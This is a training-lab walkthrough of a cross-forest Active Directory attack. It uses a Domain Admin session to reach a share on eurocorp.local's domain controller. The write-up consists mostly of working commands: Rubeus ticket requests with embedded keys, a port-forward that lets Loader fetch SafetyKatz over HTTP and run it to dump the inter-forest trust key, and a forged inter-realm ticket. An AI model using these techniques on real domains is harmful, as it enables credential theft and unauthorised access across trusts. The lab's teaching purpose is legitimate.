# Lab 20

With DA privileges on dollarcorp.moneycorp.local, get access to SharedwithDCorp share on the DC of eurocorp.local forest.

We need the inter-forest trust key between dollarcorp (dcorp) and eurocorp (ecorp). The trust key lives on dcorp-dc, so we dump it there with Mimikatz's `lsadump::trust`.

Start by getting a DA session (svcadmin) with Rubeus, copy Loader.exe to dcorp-dc, and set up port forwarding on dcorp-dc so that Loader can fetch SafetyKatz over HTTP from the student VM.

{% code overflow="wrap" %}

```
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

winrs -r:dcorp-dc cmd

netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.72

# On student: Argsplit for "lsadump::trust"
# On svcadmin:
C:\Users\svcadmin> C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "%Pwn% /patch" "exit"
```

{% endcode %}

With the trust key we can now forge the inter-realm (referral) TGT for eurocorp.local. Note that we do not inject SID History here: SID filtering is enabled on forest trusts by default, so any foreign SID we added would be stripped when the ticket is used across the trust.

{% code overflow="wrap" %}

```
# Argsplit silver		
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL /rc4:142b07ad5c09b715a883c5014044421d /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /nowrap
```

{% endcode %}

Copy the base64 ticket from the `silver` output and use Rubeus `asktgs` to request a CIFS service ticket for eurocorp-dc from the eurocorp DC, injecting it into the current session with `/ptt`.

{% code overflow="wrap" %}

```
C:\AD\Tools\Rubeus.exe asktgs /service:cifs/eurocorp-dc.eurocorp.LOCAL /dc:eurocorp-dc.eurocorp.LOCAL /ptt /ticket:doIGFjCCBhKgAwIBBaEDAgEWooIE4jCCBN5hggTaMIIE1qADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa.....
```

{% endcode %}

With the service ticket imported, we can now access the shared folder on eurocorp-dc.

```
C:\AD\Tools>dir \\eurocorp-dc.eurocorp.local\SharedwithDCorp\
```
